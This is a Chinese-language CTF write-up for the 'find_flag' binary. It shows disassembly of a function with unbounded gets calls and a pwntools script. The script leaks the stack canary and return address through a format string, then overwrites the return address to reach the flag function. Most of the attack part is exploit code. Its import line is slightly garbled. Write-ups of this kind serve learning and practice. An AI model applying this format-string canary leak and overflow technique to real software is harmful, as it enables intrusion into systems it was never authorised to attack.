解题过程
分析find_flag程序,存在的漏洞位于sub_132F函数中,该函数中,存在栈溢出漏洞,如下所示:
.text:000000000000132F sub_132F proc near ; CODE XREF: main+71↓p
.text:000000000000132F; __unwind {
.text:000000000000132F endbr64
.text:0000000000001333 push rbp
.text:0000000000001334 mov rbp, rsp
.text:0000000000001337sub rsp, 60h
.text:000000000000133B mov rax, fs:28h
.text:0000000000001344 mov [rbp-8], rax
.text:0000000000001348 xor eax, eax
.text:000000000000134A lea rdi, aHiWhatSYourNam ; "Hi! What's your name? "
.text:0000000000001351 mov eax, 0
.text:0000000000001356 call sub_1100
.text:000000000000135B lea rax, [rbp-60h]
.text:000000000000135F mov rdi, rax
.text:0000000000001362 mov eax, 0
.text:0000000000001367 call sub_1110 ; gets读入数据,未限制大小
.text:000000000000136C lea rdi, aNiceToMeetYou ; "Nice to meet you, "
.text:0000000000001373 mov eax, 0
.text:0000000000001378 call sub_1100
.text:000000000000137D lea rax, [rbp-60h]
.text:0000000000001381 mov rcx, 0FFFFFFFFFFFFFFFFh
.text:0000000000001388 mov rdx, rax
.text:000000000000138B mov eax, 0
.text:0000000000001390 mov rdi, rdx
.text:0000000000001393 repne scasb
.text:0000000000001395 mov rax, rcx
.text:0000000000001398not rax
.text:000000000000139B lea rdx, [rax-1]
.text:000000000000139F lea rax, [rbp-60h]
.text:00000000000013A3 add rax, rdx
.text:00000000000013A6 mov word ptr [rax], 0A21h
.text:00000000000013AB mov byte ptr [rax+2], 0
.text:00000000000013AF lea rax, [rbp-60h]
.text:00000000000013B3 mov rdi, rax
.text:00000000000013B6 mov eax, 0
.text:00000000000013BB call sub_1100
.text:00000000000013C0 lea rdi, aAnythingElse ; "Anything else? "
.text:00000000000013C7 mov eax, 0
.text:00000000000013CC call sub_1100
.text:00000000000013D1 lea rax, [rbp-40h]
.text:00000000000013D5 mov rdi, rax
.text:00000000000013D8 mov eax, 0
.text:00000000000013DD call sub_1110 ; gets读入数据,未限制大小
.text:00000000000013E2 nop
.text:00000000000013E3 mov rax, [rbp-8]
.text:00000000000013E7 xor rax, fs:28h
.text:00000000000013F0 jz short locret_13F7
.text:00000000000013F2 call sub_10D0
.text:00000000000013F7
.text:00000000000013F7 locret_13F7: ; CODE XREF: sub_132F+C1↑j
.text:00000000000013F7 leave
.text:00000000000013F8 retn
.text:00000000000013F8; } // starts at 132F
.text:00000000000013F8 sub_132F endp
利用代码如下所示:
from pwn import*
importstruct
fs = "%17$lx,%19$lx"
flag = 0x0000000000001231
ret_offset = 0x146f
p = remote('127.0.0.1', 20701)
#p = process('./canary')
print((p.recvuntil('name? ')).decode())
p.sendline(fs.encode())
buf = (p.recvuntil('!\n').decode())
print(buf)
data = buf.split()[4].split('!')[0]
canary = (int((data.split(',')[0]), 16))
ret = (int((data.split(',')[1]), 16))
print(canary)
print(ret)
print(p.recvuntil('? ').decode())
payload = (("A"*56).encode())
payload += struct.pack("<Q", canary)
payload += (("A"*8).encode())
payload += struct.pack("<Q", flag + ret - ret_offset)
p.sendline(payload)
p.interactive()